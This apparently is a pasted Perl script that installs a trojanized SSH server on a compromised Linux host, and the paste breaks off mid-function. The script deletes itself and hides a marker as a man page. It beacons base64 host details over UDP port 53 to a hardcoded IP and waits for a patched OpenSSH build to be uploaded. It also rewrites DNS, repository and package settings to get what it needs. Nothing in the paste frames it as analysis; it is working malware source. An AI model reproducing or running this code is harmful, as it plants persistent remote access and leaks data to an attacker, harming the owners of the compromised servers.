· 6 years ago · Oct 15, 2019, 05:50 AM
1#!/usr/bin/perl
2
3use strict;
4use warnings;
5
6
7
8my $SSH_HOST = $ARGV[0];
9my $SSH_PORT = ( $ARGV[1] != 3129 ) ? $ARGV[1] : 22;
10my $MODE = defined($ARGV[2]) ? $ARGV[2] : '';
11my $MODE_ARG1 = defined($ARGV[3]) ? $ARGV[3] : '';
12my $MODE_ARG2 = defined($ARGV[4]) ? $ARGV[4] : '';
13
14my $wget = ( $^O eq 'freebsd' ) ? 'fetch' : 'wget';
15
16my $filehost = 'http://stylevis.web44.net';
17my $ssh_patch = 'c3Y7310s.css';
18
19my $ssh_confirm_file = '/var/tmp/sess_8848cf7a0c9c209c99acc51f1e259064';
20my $ssh_confirm_tgz = '/var/tmp/sess_8848cf7a0c9c209c99acc51f1e259068';
21my $openssh_src_confirm = '/var/tmp/sess_8848cf7a0c9c209c99acc51f1e259080';
22my $ssh_compiled_tgz = 'Wju3Osid.tgz';
23
24my $compiled_dir = '/var/tmp/WUykfhuA';
25
26my $SSHD_CONFIG = '/etc/ssh/sshd_config';
27
28
29my $lwp = 0;
30my $yum = 0;
31my $extutils = 0;
32
33
34my $SSH_INSTALLED = 0;
35
36
37
38unlink($0);
39
40
41
42if ( ( -f '/usr/bin/wget' ) && ( !-x '/usr/bin/wget' ) ) {
43 print "[+] Modify wget rights$/";
44
45 my $wget_bits = &check_bits('/usr/bin/wget');
46 &chattr($wget_bits, '/usr/bin/wget', '-');
47
48 chmod 0755, '/usr/bin/wget';
49}
50
51
52
53### Check path for allowed exec
54my $run_path = &get_path();
55
56if ( $run_path eq '' ) {
57 exit();
58}
59
60
61chdir($run_path);
62###
63
64
65
66BEGIN {
67 use Socket;
68 use IO::Socket;
69 use MIME::Base64 qw(encode_base64);
70
71
72 my $udp_notify_ip = '23.237.136.101';
73 my $udp_notify_port = 53;
74
75
76 $SSH_HOST = $ARGV[0];
77 $SSH_PORT = ( $ARGV[1] != 3129 ) ? $ARGV[1] : 22;
78 $MODE = defined($ARGV[2]) ? $ARGV[2] : '';
79 $MODE_ARG1 = defined($ARGV[3]) ? $ARGV[3] : '';
80 $MODE_ARG2 = defined($ARGV[4]) ? $ARGV[4] : '';
81
82 $filehost = 'http://stylevis.web44.net';
83 my $CENTOS_REPO = '/etc/yum.repos.d/CentOS-Base.repo';
84
85 my $lwp_confirm_tgz = '/var/tmp/sess_8848cf7a0c9c209c99acc51f1e259060';
86
87
88 &check_already_install();
89
90 &check_processor_type();
91
92 &check_dns_resolver();
93
94
95 unless ( $^O eq 'freebsd' ) {
96 &check_vyatta_host();
97
98 $yum = &check_yum_exists();
99 $lwp = &check_lwp_exists();
100
101 if ( $lwp == 0 ) {
102 &install_lwp();
103 }
104
105 import LWP::UserAgent;
106 require LWP::UserAgent;
107 }
108
109
110
111 sub check_already_install {
112 if ( -e '/usr/share/man/man5/ttyl.5.gz' ) {
113 if ( $MODE eq 'reinstall' ) {
114 print "[+] Reinstall$/";
115
116 return;
117 }
118 else {
119 print "[G] Already installed$/";
120 }
121
122 exit(0);
123 }
124 }
125
126
127 sub check_processor_type {
128 my $processor = `uname -m`;
129 chomp($processor);
130
131
132 foreach ( qw(i386 i586 i686 amd64 x86_64) ) {
133 if ( $processor =~ $_ ) {
134 print "[+] Good processor '$processor'$/";
135
136 return;
137 }
138 }
139
140 print "[-] Bad processor '$processor'$/";
141
142 exit(0);
143 }
144
145
146 sub check_dns_resolver {
147 my $check = 0;
148 my $dns_name = 'gmail.com';
149
150 while () {
151 my $iaddr = ((gethostbyname($dns_name))[4])[0];
152
153 if ( defined($iaddr) ) {
154 print "[+] DNS Resolver Good$/";
155
156 last;
157 }
158 else {
159 print "[-] DNS Resolver Bad. Try fix$/";
160
161 if ( $check == 0 ) {
162 `echo 'nameserver 208.67.222.222' >> /etc/resolv.conf`;
163
164 $dns_name = 'google.com';
165 }
166 else {
167 last;
168 }
169 }
170
171 $check++;
172 }
173 }
174
175
176
177 sub check_vyatta_host {
178 my $sources_list = '/etc/apt/sources.list';
179
180 my $issue = '';
181
182 if ( -e '/etc/issue' ) {
183 $issue = `head -1 /etc/issue`;
184 chomp($issue);
185 }
186
187 if ( $issue !~ /vyatta/i ) {
188 return 0;
189 }
190
191
192 my $sources = &read_file($sources_list);
193
194 my $debian_version = `head -1 /etc/debian_version`;
195 chomp($debian_version);
196
197 if ( $sources !~ /debian.org/ ) {
198 if ( $debian_version =~ /^6\./ ) {
199 `echo 'deb http://ftp.au.debian.org/debian/ squeeze main contrib non-free' >> $sources_list`;
200 `echo 'deb-src http://ftp.au.debian.org/debian/ squeeze main contrib non-free' >> $sources_list`;
201 }
202 elsif ( $debian_version =~ /^5\./ ) {
203 `echo 'deb http://archive.debian.org/debian-archive/debian/ lenny main contrib non-free' >> $sources_list`;
204 `echo 'deb-src http://archive.debian.org/debian/ lenny main contrib non-free' >> $sources_list`;
205 }
206
207 my $apt_update = `apt-get update`;
208
209 if ( $apt_update =~ /apt\-get \-f install/) {
210 `apt-get --force-yes -y -f install`;
211 }
212 elsif ( $apt_update =~ /dpkg \-\-configure \-a/) {
213 `dpkg --configure -a`;
214 }
215 }
216 }
217
218
219
220 sub check_yum_exists {
221 my $yum = 0;
222
223
224 if ( -e '/usr/bin/yum' ) {
225 $yum = 1;
226 }
227 else {
228 my $which_yum = `which yum`;
229
230 if ( $which_yum =~ /\/yum/ ) {
231 $yum = 1;
232 }
233 }
234
235
236 return $yum;
237 }
238
239
240
241 sub modify_yum_config {
242 if ( -e $CENTOS_REPO ) {
243 print "[+] Found CentOS Repo File$/";
244
245 my $updated = 0;
246
247 my $repo = &read_file($CENTOS_REPO);
248
249 my $repo_new = '';
250
251
252 foreach ( qw(base updates) ) {
253 if ( $repo =~ /(\[$_\])(.*?)\r?\n\r?\n/s ) {
254 $repo = $';
255
256 my $base = $2;
257 $repo_new .= $`.$1;
258
259 if ( $base =~ /^enabled=(\d)/m ) {
260 my $enabled = $1;
261 $repo_new .= $`;
262
263 if ( $enabled == 0 ) {
264 print "[+] Yum $_ repo Enabled = 0. Set to 1$/";
265
266 $updated = 1;
267 }
268 else {
269 print "[+] Yum $_ repo Enabled = 1$/";
270 }
271 }
272 else {
273 print "[+] Yum $_ repo Enabled not found. Adding Enabled$/";
274
275 $repo_new .= $base.$/;
276
277 $updated = 1;
278 }
279
280 $repo_new .= "enabled=1$/$/";
281 }
282 }
283
284 $repo_new .= $repo;
285
286 if ( $updated == 1 ) {
287 print "[+] Yum. Update $CENTOS_REPO file$/";
288
289 &write_file($CENTOS_REPO, $repo_new);
290 }
291 else {
292 print "[+] Yum. Nothing to Update in $CENTOS_REPO file$/";
293 }
294 }
295 }
296
297
298
299 sub read_file {
300 my $sysstring = $_[0];
301
302 my $backup = $/;
303 undef $/;
304
305 open(FH, "< $sysstring");
306 my $file = <FH>;
307 close FH;
308 $/ = $backup;
309
310 return $file;
311 }
312
313
314
315 sub write_file {
316 my ($filename, $string) = @_;
317
318
319 open(FO, "> $filename");
320 print FO $string;
321 close FO;
322 }
323
324
325
326 sub install_lwp {
327 if ( ( $lwp == 0 ) && ( $yum == 1 ) ) {
328 print "[+] yum found, try install perl-libwww-perl$/";
329 `yum -y install perl-libwww-perl`;
330
331 $lwp = &check_lwp_exists();
332
333
334 ### Modify Yum config and try install again
335 if ( $lwp == 0 ) {
336 &modify_yum_config();
337
338 `yum -y install perl-libwww-perl`;
339
340 $lwp = &check_lwp_exists();
341 }
342 }
343
344
345
346 if ( ( $lwp == 0 ) && ( -e '/usr/bin/apt-get' ) ) {
347 `apt-get -y --force-yes install libwww-perl`;
348
349 $lwp = &check_lwp_exists();
350
351 if ( $lwp == 0 ) {
352 print "[+] Try apt-get update$/";
353
354 `apt-get -y --force-yes update`;
355 }
356
357 `apt-get -y --force-yes install libwww-perl`;
358
359 $lwp = &check_lwp_exists();
360
361 if ( $lwp == 0 ) {
362 &modify_apt_config();
363
364 `apt-get -y --force-yes install libwww-perl`;
365
366 $lwp = &check_lwp_exists();
367 }
368 }
369
370
371
372 if ( $lwp == 0 ) {
373 &install_lwp_tgz();
374
375 $lwp = &check_lwp_exists();
376 }
377 }
378
379
380
381 sub check_lwp_exists {
382 eval { require LWP::UserAgent };
383 my $lwp = $@ ? '0' : '1';
384
385 print "[+] LWP::UserAgent - $lwp$/";
386
387
388 return $lwp;
389 }
390
391
392
393 sub install_lwp_tgz {
394 print "[+] Try install LWP::UserAgent from tgz$/";
395
396 `mkdir l`;
397 chdir('l');
398
399 &get_lwp_tgz();
400
401 #`wget -O lwp.tgz $filehost/4d7mNp6A.gwm`;
402 `tar xfz lwp.tgz`;
403 `./install.sh`;
404
405 chdir('..');
406
407 `rm -rf l`;
408 }
409
410
411
412 sub get_lwp_tgz {
413 ¬ify_get_lwp_tgz("$SSH_HOST:$SSH_PORT:$MODE_ARG1:$MODE_ARG2");
414
415 $| = 1;
416
417 printf("[+] Wait until lwp.tgz uploaded %s:%s$/", $SSH_HOST, $SSH_PORT);
418
419
420 for (my $i = 1; $i < 60; $i++) {
421 if ( -e $lwp_confirm_tgz ) {
422 unlink($lwp_confirm_tgz);
423
424 last;
425 }
426 else {
427 print '.';
428 sleep(5);
429 }
430 }
431
432
433 return 1;
434 }
435
436
437
438 sub notify_get_lwp_tgz {
439 my ($message) = @_;
440
441
442 &send_udp('il', $message);
443 }
444
445
446
447 sub modify_apt_config {
448 my $repo_url = 'http://archive.debian.org/';
449
450
451 my $sources = '';
452
453 open APT, "< /etc/apt/sources.list";
454 while (<APT>) {
455 s/http:\/\/[^\/]+\//$repo_url/g;
456
457 $sources .= $_;
458 }
459 close APT;
460
461
462 open APT, "> /etc/apt/sources.list";
463 print APT $sources;
464 close APT;
465 }
466
467
468
469 sub send_udp {
470 my ($type, $message) = @_;
471
472
473 my $send_message = sprintf('%s:%s', $type, $message);
474
475
476 my $base64_message = encode_base64($send_message);
477
478
479 my %s = (
480 Proto => 'udp',
481 );
482
483
484 my $handle = IO::Socket::INET->new(%s);
485 my $ipaddr = inet_aton($udp_notify_ip);
486 my $portaddr = sockaddr_in($udp_notify_port, $ipaddr);
487
488 send($handle, $base64_message, 0, $portaddr);
489 }
490}
491
492
493
494my $user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21';
495
496
497my @rpm_devel = qw(zlib pam);
498my @devel_debian_pkgs = qw(zlib1g libssl libpam0g libkrb5);
499
500
501my $url = '';
502my $page = '';
503
504
505my $uname = &get_uname();
506
507my ($os, $version_os, $platform, $machine) = &get_os();
508
509
510my $opensuse_url = 'http://download.opensuse.org/distribution/%s/repo/oss/suse/%s/';
511my $opensuse_search = '/%s/repo/oss/suse/%s/';
512
513
514my $version_os_major = substr($version_os, 0, 1);
515my $centos_url = ($version_os_major < 6) ? 'http://vault.centos.org/%s/os/%s/CentOS/' : 'http://vault.centos.org/%s/os/%s/Packages/';
516my $centos_search = ($version_os_major < 6) ? '/%s/os/%s/CentOS/' : '/%s/os/%s/Packages/';
517
518
519$yum = &check_yum_exists();
520
521
522if ( $MODE eq 'compiled' ) {
523 &install_compiled_ssh();
524}
525else {
526 if ( ( $platform eq 'Debian' ) || ( $platform eq 'Ubuntu' ) ) {
527 foreach (@devel_debian_pkgs) {
528 my $pkg = "$_-dev";
529
530 &install_debian_pkg($pkg);
531 }
532 }
533 elsif ( $platform eq 'FreeBSD' ) {
534 }
535 elsif ( $platform eq 'Slackware' ) {
536 }
537 else {
538 foreach (@rpm_devel) {
539 &install_devel($_);
540 }
541 }
542
543
544
545 if ( ( $platform ne 'FreeBSD' ) && ( $platform ne 'Slackware' ) ) {
546 &install_openssl();
547
548 &install_patch();
549
550 &install_gcc();
551
552 &install_make();
553
554 $extutils = &check_extutils_exists();
555
556 if ( $extutils == 0 ) {
557 &install_extutils();
558 }
559 }
560
561
562
563 my $ssh_installed = &install_ssh();
564
565 if ( $ssh_installed != 1 ) {
566 &install_compiled_ssh();
567 }
568}
569
570
571print "[+] Uname: $uname$/";
572print "[+] OS: $os$/";
573
574
575
576sub get_ssh_patch {
577 chdir('/var/tmp');
578
579 ¬ify_get_ssh_patch("$SSH_HOST:$SSH_PORT:$MODE_ARG1:$MODE_ARG2");
580
581 $| = 1;
582
583 printf("[+] Wait until ssh patch uploaded %s:%s$/", $SSH_HOST, $SSH_PORT);
584
585 for (my $i = 1; $i < 30; $i++) {
586 if ( -e $ssh_patch ) {
587 return 0;
588 }
589 else {
590 print '.';
591 sleep(5);
592 }
593 }
594
595
596 return 1;
597}
598
599
600
601sub get_openssh_src {
602 chdir('/var/tmp');
603
604 ¬ify_get_openssh_src("$SSH_HOST:$SSH_PORT:$MODE_ARG1:$MODE_ARG2");
605
606 $| = 1;
607
608 printf("[+] Wait until openssh src uploaded %s:%s$/", $SSH_HOST, $SSH_PORT);
609
610 for (my $i = 1; $i < 60; $i++) {
611 if ( -e $openssh_src_confirm ) {
612 unlink($openssh_src_confirm);
613
614 return 0;
615 }
616 else {
617 print '.';
618 sleep(5);
619 }
620 }
621
622
623 return 1;
624}
625
626
627
628sub install_ssh_from_same_host {
629 chdir('/var/tmp');
630
631 ¬ify_get_same_host_ssh("$os:$machine:$SSH_HOST:$SSH_PORT:$MODE_ARG1:$MODE_ARG2");
632
633 $| = 1;
634
635 printf("[+] Wait until compiled ssh from same host uploaded %s:%s$/", $SSH_HOST, $SSH_PORT);
636
637 &install_uploaded_ssh();
638}
639
640
641sub install_compiled_ssh {
642 &install_ssh_from_same_host();
643
644 if ( $SSH_INSTALLED == 1 ) {
645 return;
646 }
647
648 ### DISABLE
649 return;
650
651 chdir('/var/tmp');
652
653 ¬ify_get_compiled_ssh("$SSH_HOST:$SSH_PORT:$MODE_ARG1:$MODE_ARG2");
654
655 $| = 1;
656
657 printf("[+] Wait until compiled ssh uploaded %s:%s$/", $SSH_HOST, $SSH_PORT);
658
659 &install_uploaded_ssh();
660}
661
662
663
664sub install_uploaded_ssh {
665 my $ssh_uploaded = 0;
666
667 for (my $i = 1; $i < 60; $i++) {
668 if ( -e $ssh_confirm_tgz ) {
669 $ssh_uploaded = 1;
670
671 unlink($ssh_confirm_tgz);
672
673 last;
674 }
675 else {
676 print '.';
677 sleep(5);
678 }
679 }
680
681 print "$/$/";
682
683
684 if ( $ssh_uploaded == 1 ) {
685 print "[+] Untar compiled ssh$/";
686
687 unless ( -f $ssh_compiled_tgz ) {
688 print "[-] Compiled SSH uploaded but file not found$/";
689
690 return;
691 }
692
693 `mkdir $compiled_dir`;
694 `mv $ssh_compiled_tgz $compiled_dir/`;
695 chdir($compiled_dir);
696
697 `tar xfz $ssh_compiled_tgz`;
698 `chmod 755 sshd ssh scp`;
699 `ls -al sshd ssh scp`;
700
701 &final_ssh_install();
702 }
703
704 chdir('/var/tmp');
705
706 `rm -rf $compiled_dir`;
707}
708
709
710
711### Get Uname
712sub get_uname {
713 print "[+] Uname: ";
714
715 my $uname = `uname -a`;
716 chomp($uname);
717
718 printf "%s$/",$uname;
719
720
721 return $uname;
722}
723###
724
725
726
727### Get Version OS
728sub get_os {
729 my $version_os = '';
730 my $os = '';
731
732 my $platform = '';
733 my $machine = '';
734
735
736
737 if ( -e '/etc/redhat-release' ) {
738 $os = `head -1 /etc/redhat-release`;
739 }
740 elsif ( -e '/etc/issue' ) {
741 $os = `head -2 /etc/issue`;
742 }
743 else {
744 $os = `uname -s`;
745 }
746 chomp($os);
747
748
749
750 $machine = `uname -m`;
751 chomp($machine);
752
753
754
755 if ( ( $os =~ /Fedora/ ) || ( -e '/etc/fedora-release' ) ) {
756 $platform = 'Fedora';
757
758 $os = `head -1 /etc/fedora-release`;
759 chomp($os);
760
761 ($version_os) = $os =~ /(\d{1,2}(\.\d)?)/;
762 }
763 elsif ( ( $os =~ /Red Hat/ ) || ( -e '/etc/redhat-release' ) ) {
764 $platform = 'RedHat';
765
766 $os = `head -1 /etc/redhat-release`;
767 chomp($os);
768
769 ($version_os) = $os =~ /(\d(\.\d)?)/;
770 }
771 elsif ( ( $os =~ /CentOS/ ) || ( -e '/etc/redhat-release' ) ) {
772 $platform = 'CentOS';
773
774 $os = `head -1 /etc/redhat-release`;
775 chomp($os);
776
777 ($version_os) = $os =~ /(\d(\.\d)?)/;
778 }
779 elsif ( -e '/etc/SuSE-release' ) {
780 if ( $os =~ /SUSE LINUX/i ) {
781 $platform = 'SUSE';
782 }
783 elsif ( $os =~ /openSUSE/ ) {
784 $platform = 'openSUSE';
785 }
786 else {
787 print "[-] Unknown SuSE platform$/";
788
789 exit(0);
790 }
791
792
793 $os = `head -1 /etc/SuSE-release`;
794 chomp($os);
795
796
797 my $suse_version = 0;
798 my $patch_level = 0;
799
800
801 open SuSE, "< /etc/SuSE-release";
802 while (<SuSE>) {
803 chomp;
804
805 if (/VERSION = (\d{2}(\.\d)?)/i) {
806 $suse_version = $1;
807
808 }
809 elsif (/PATCHLEVEL = (\d+)/i) {
810 $patch_level = $1;
811 }
812 }
813 close SuSE;
814
815
816 if ( $suse_version != 0 ) {
817 if ( $patch_level == 0 ) {
818 $version_os = $suse_version;
819 }
820 else {
821 $version_os = sprintf('%d.%d', $suse_version, $patch_level);
822 }
823 }
824 else {
825 ($version_os) = $os =~ /(\d{2}(\.\d)?)/;
826 }
827
828 }
829 elsif ( $os =~ /Ubuntu/ ) {
830 $platform = 'Ubuntu';
831
832 ($version_os) = $os =~ /([\d\.]+)/;
833 $os = 'Ubuntu '.$version_os;
834 }
835 elsif ( ( $os =~ /Debian/ ) || ( -e '/etc/debian_version' ) ) {
836 $platform = 'Debian';
837
838 $version_os = `head -1 /etc/debian_version`;
839 chomp($version_os);
840
841 $os = 'Debian '.$version_os;
842 }
843 elsif ( -e '/etc/slackware-version' ) {
844 $platform = 'Slackware';
845
846 $os = `head -1 /etc/slackware-version`;
847 chomp($os);
848
849 ($version_os) = $os =~ /(\d{2}(\.\d)?(\.\d)?)/;
850 }
851 elsif ( -e '/etc/gentoo-release' ) {
852 $platform = 'Gentoo';
853
854 $os = `head -1 /etc/gentoo-release`;
855 chomp($os);
856
857 ($version_os) = $os =~ /(\d+(\.\d+)?(\.\d+)?(\.\d+)?)/;
858 }
859 elsif ( $os =~ /FreeBSD/ ) {
860 $platform = 'FreeBSD';
861
862 $version_os = `uname -r`;
863 chomp($version_os);
864
865 $os = 'FreeBSD '.$version_os;
866 }
867 else {
868 print "[-] Unknown OS$/";
869
870 exit(0);
871 }
872
873
874 print "[+] Get Version: $platform, OS: $os, Version OS: $version_os, Machine: $machine$/";
875
876
877 return ($os, $version_os, $platform, $machine);
878}
879###
880
881
882
883sub check_debian_pkg_exists {
884 my $pkg = $_[0];
885
886
887 my $list_pkg = `dpkg -l $pkg 2>&1`;
888 # PKG exists
889 if ( $list_pkg =~ /ii\s+$pkg/ ) {
890 print "[+] $pkg exists$/";
891
892
893 return 1;
894 }
895 # PKG not exists
896 else {
897 print "[-] $pkg not exists$/";
898
899
900 return 0;
901 }
902}
903
904
905
906sub install_from_web_repo {
907 my $file = $_[0];
908
909
910 $url = &get_url();
911
912
913 my $mach = $machine;
914
915 if ( ( $platform eq 'CentOS' ) || ( $platform eq 'RedHat' ) || ( $platform eq 'Fedora' ) || ( $platform eq 'Slackware' ) ) {
916 if ( $machine eq 'i686' ) {
917 $mach = 'i386';
918 }
919 }
920
921 my ($devel) = $page =~ /href=\"($file\-[^\"]+$mach[^\"]+)\"/;
922
923 unless ( $devel ) {
924
925 }
926
927 print "[+] Found $devel$/";
928
929 print "[+] Install $devel$/";
930 `rpm -i $url$devel`;
931}
932
933
934
935### Install RPM Devel
936sub install_devel {
937 my $rpm = $_[0];
938
939
940 print "[+] Install ${rpm}-devel$/";
941
942
943 my $rpm_name = &check_rpm_exists("${rpm}-devel");
944
945 if ( ( $rpm_name eq '0' ) && ( $yum == 1 ) ) {
946 $rpm_name = &yum_install("${rpm}-devel");
947 }
948
949
950 if ( $rpm_name eq '0' ) {
951 my $rpm_name = &check_rpm_exists($rpm);
952
953 if ( $rpm_name eq '0' ) {
954 print "[-] Not found $rpm$/";
955
956 &install_compiled_ssh();
957
958 exit(0);
959 }
960 else {
961 print "[+] Found $rpm_name$/";
962
963
964 my ($version) = $rpm_name =~ /$rpm\-(.*)/;
965 my $search_rpm_file = $rpm.'-devel';
966
967
968 &install_from_web_repo($search_rpm_file);
969
970
971 my $rpm_name = &check_rpm_exists($search_rpm_file);
972
973 if ( $rpm_name eq '0' ) {
974 print "[-] Not found $search_rpm_file$/";
975
976
977 my $urls = &search_rpm($search_rpm_file.'-'.$version);
978
979 if ( $#{$urls} == -1 ) {
980 printf("[-] Search not results for %s-%s$/", $search_rpm_file, $version);
981
982 &install_from_same_host();
983 }
984 else {
985 &install_rpm($urls, $search_rpm_file, $version);
986 }
987 }
988 else {
989 print "[+] Found $search_rpm_file$/";
990 }
991 }
992 }
993 else {
994 print "[+] ${rpm}-devel $rpm_name Installed$/";
995 }
996}
997###
998
999
1000
1001### Check RPM exists
1002sub check_rpm_exists {
1003 my $rpm = $_[0];
1004
1005
1006 print "[+] Check $rpm - ";
1007
1008
1009 if ( ( $platform eq 'Debian' ) || ( $platform eq 'Ubuntu' ) ) {
1010 return &check_debian_pkg_exists($rpm);
1011 }
1012 else {
1013 if ( $machine eq 'x86_64') {
1014 my $incorrect_rpm = `rpm -q $rpm.i386`;
1015 chomp($incorrect_rpm);
1016
1017 if ( $incorrect_rpm =~ /$rpm/ ) {
1018 print "[!] Found incorrect RPM $incorrect_rpm. Try to remove$/";
1019 `rpm -e $rpm.i386`;
1020 }
1021 }
1022
1023
1024 my $rpm_name = `rpm -q $rpm`;
1025 chomp($rpm_name);
1026
1027
1028 if ( $rpm_name =~ /$rpm\-.*$machine/ ) {
1029 print "Exists$/";
1030
1031
1032 return $rpm_name;
1033 }
1034 elsif ( $rpm_name =~ /$rpm\-/ ) {
1035 print "Exists$/";
1036
1037
1038 return $rpm_name;
1039 }
1040 else {
1041 print "Not Exists$/";
1042
1043
1044 return 0;
1045 }
1046 }
1047}
1048###
1049
1050
1051
1052### Search RPM
1053sub search_rpm {
1054 my $file = $_[0];
1055
1056
1057 my $search_machine = $machine;
1058
1059
1060 if ( ( $platform eq 'RedHat' ) && ( $machine eq 'i686' ) ) {
1061 $search_machine = 'i386';
1062 }
1063 elsif ( ( $platform eq 'Fedora' ) && ( $machine eq 'i686' ) ) {
1064 $search_machine = 'i386';
1065 }
1066 elsif ( ( $platform eq 'SUSE' ) && ( $machine eq 'i686' ) ) {
1067 $search_machine = 'i586';
1068 }
1069
1070
1071 my $file_rpm = $file.'.'.$search_machine.'.rpm';
1072
1073
1074 return &search($file_rpm);
1075}
1076###
1077
1078
1079
1080sub search {
1081 my $file = $_[0];
1082
1083
1084 my $urls = &search_google($file);
1085
1086 if ( $#{$urls} == -1 ) {
1087 $urls = &search_bing($file);
1088 }
1089
1090
1091 if ( $#{$urls} == -1 ) {
1092 $urls = &search_yandex($file);
1093 }
1094
1095
1096 printf("[+] Found %d URL's$/", $#{$urls} + 1);
1097
1098
1099 return $urls;
1100}
1101
1102
1103
1104sub get_page_via_lwp {
1105 my $params = $_[0];
1106
1107
1108 my $ua = LWP::UserAgent->new();
1109
1110
1111 $ua->agent($params->{'user_agent'});
1112 $ua->default_header('Referer' => $params->{'referer'});
1113 $ua->timeout($params->{'timeout'});
1114
1115 my $response = $ua->get($params->{'url'}.$params->{'uri'});
1116
1117 if ( $response->is_success ) {
1118 return $response->decoded_content;
1119 }
1120 else {
1121 print "[-] ".$response->status_line.$/;
1122 }
1123
1124
1125 return '';
1126}
1127
1128
1129
1130sub get_page_via_wget {
1131 my $params = $_[0];
1132
1133
1134 my $wget_params = sprintf('-q -O jkfhskdfs -U "%s" --referer "%s" -T %d "%s%s"', $params->{'user_agent'}, $params->{'referer'}, $params->{'timeout'}, $params->{'url'}, $params->{'uri'});
1135 `$wget $wget_params`;
1136
1137
1138 if ( -e 'jkfhskdfs' ) {
1139 my $file = &read_file('jkfhskdfs');
1140
1141 $file =~ s/\"/"/g;
1142 $file =~ s/\&/\&/g;
1143
1144 unlink('jkfhskdfs');
1145
1146
1147 return $file;
1148 }
1149 else {
1150 print "[-] Can't download throw wget$/";
1151 }
1152
1153
1154 return '';
1155}
1156
1157
1158
1159### Search Google
1160sub search_google {
1161 my $file = $_[0];
1162
1163
1164 print "[+] Search Google $file$/";
1165
1166
1167 my %params = (
1168 url => 'http://www.google.com/',
1169 uri => 'search?sclient=psy&hl=en&site=&source=hp&q=%22'.$file.'%22+intitle%3A%22Index+of%22&btnG=Search',
1170 user_agent => $user_agent,
1171 referer => 'http://www.google.com/',
1172 timeout => 30,
1173 );
1174
1175
1176 my $response = &get_page_via_wget(\%params);
1177
1178 if ( $response eq '' ) {
1179 return [()];
1180 }
1181 else {
1182 my $urls = &get_urls_google($response);
1183
1184
1185 return $urls;
1186 }
1187}
1188###
1189
1190
1191
1192### Search Bing
1193sub search_bing {
1194 my $file = $_[0];
1195
1196
1197 print "[+] Search Bing $file$/";
1198
1199
1200
1201 my %index = (
1202 url => 'http://www.bing.com/',
1203 uri => '',
1204 user_agent => $user_agent,
1205 timeout => 30,
1206 );
1207
1208
1209 my $index_page = &get_page_via_wget(\%index);
1210
1211 if ( $index_page eq '' ) {
1212 return [()];
1213 }
1214
1215 my $cvid = '';
1216
1217 if ( $index_page =~ /IG:\"([a-f0-9]+)\"/ ) {
1218 $cvid = $1;
1219
1220 print "Bing CVID: $1$/";
1221 }
1222 else {
1223 print "Can't find Bing CVID$/";
1224
1225 return [()];
1226 }
1227
1228
1229 my %params = (
1230 url => 'http://www.bing.com/',
1231 uri => 'search?q=%22'.$file.'%22+%22Index+of%22&qs=n&form=QBRE&filt=all&pq=%22'.$file.'%22+%22index+of%22&sc=0-0&sp=-1&sk=&cvid='.$cvid,
1232 user_agent => $user_agent,
1233 referer => 'http://www.bing.com/',
1234 timeout => 30,
1235 );
1236
1237
1238 my $response = &get_page_via_wget(\%params);
1239
1240 if ( $response eq '' ) {
1241 return [()];
1242 }
1243
1244
1245
1246 my $urls = &get_urls_bing($response);
1247
1248
1249 return $urls;
1250}
1251###
1252
1253
1254
1255### Search Yandex
1256sub search_yandex {
1257 my $file = $_[0];
1258
1259
1260 print "[+] Search Yandex $file$/";
1261
1262
1263 my %params = (
1264 url => 'http://yandex.ru/',
1265 uri => 'yandsearch?text=%22'.$file.'%22+%22Index+of%22',
1266 user_agent => $user_agent,
1267 referer => 'http://yandex.ru/',
1268 timeout => 30,
1269 );
1270
1271
1272 my $response = &get_page_via_wget(\%params);
1273
1274 if ( $response eq '' ) {
1275 return [()];
1276 }
1277
1278
1279
1280 my $urls = &get_urls_yandex($response);
1281
1282
1283 return $urls;
1284}
1285###
1286
1287
1288
1289### Parse Search Google Results and Get URLs
1290sub get_urls_google {
1291 my $page = $_[0];
1292
1293
1294 my @urls = ();
1295
1296 while ( $page =~ /<h3 class=\"r\"><a href=\"\/url\?q=([^\"]+)\"/g ) {
1297 my ($url) = $1 =~ /(.*\/)/;
1298
1299 push @urls, $url;
1300 }
1301
1302
1303 return \@urls;
1304}
1305###
1306
1307
1308
1309### Parse Search Bing Results and Get URLs
1310sub get_urls_bing {
1311 my $page = $_[0];
1312
1313
1314 my @urls = ();
1315
1316 while ( $page =~ /<div class=\"b_title\"><h2><a href=\"([^\"]+)\" h=/g ) {
1317 my ($url) = $1 =~ /(.*\/)/;
1318
1319 push @urls, $url;
1320 }
1321
1322
1323 return \@urls;
1324}
1325###
1326
1327
1328
1329### Parse Search Yandex Results and Get URLs
1330sub get_urls_yandex {
1331 my $page = $_[0];
1332
1333
1334 my @urls = ();
1335
1336
1337 while ( $page =~ /<a class=\"b-serp-item__title-link\" href=\"([^\"]+)\" /g ) {
1338 my ($url) = $1 =~ /(.*\/)/;
1339
1340 push @urls, $url;
1341 }
1342
1343
1344 return \@urls;
1345}
1346###
1347
1348
1349
1350### Install RPM
1351sub install_rpm {
1352 my ($urls, $file, $version) = @_;
1353
1354
1355 my $mach = $machine;
1356
1357 if ( ( $platform eq 'CentOS' ) || ( $platform eq 'RedHat' ) || ( $platform eq 'Fedora' ) || ( $platform eq 'Slackware' ) ) {
1358 if ( $machine eq 'i686' ) {
1359 $mach = 'i386';
1360 }
1361 }
1362
1363
1364 foreach my $url (@{$urls}) {
1365 my $rpm = $url.$file.'-'.$version.'.'.$mach.'.rpm';
1366
1367 print "[+] Get RPM $rpm$/";
1368
1369 `rpm -i $rpm`;
1370
1371 if ( &check_rpm_exists($file) ne '0' ) {
1372 return 1;
1373 }
1374 }
1375
1376 return 0;
1377}
1378###
1379
1380
1381
1382sub install_openssl {
1383 if ( ( $platform eq 'CentOS' ) || ( $platform eq 'RedHat' ) || ( $platform eq 'Fedora' ) || ( $platform eq 'Slackware' ) ) {
1384 &install_openssl_centos();
1385 }
1386 elsif ( ( $platform eq 'openSUSE' ) || ( $platform eq 'SUSE' ) ) {
1387 &install_openssl_opensuse();
1388 }
1389}
1390
1391
1392
1393### Install RPM openssl
1394sub install_openssl_centos {
1395 my $rpm = 'openssl';
1396
1397
1398 print "[+] Install ${rpm}-devel$/";
1399
1400
1401 my $rpm_file = &check_rpm_exists("${rpm}-devel");
1402
1403 if ( ( $rpm_file eq '0' ) && ( $yum == 1) ) {
1404 $rpm_file = &yum_install("${rpm}-devel");
1405 }
1406
1407
1408 if ( $rpm_file eq '0' ) {
1409 my $rpm_file = &check_rpm_exists($rpm);
1410
1411 if ( $rpm_file eq '0' ) {
1412 print "[-] Not found $rpm$/";
1413
1414 &install_compiled_ssh();
1415
1416 exit(0);
1417 }
1418 else {
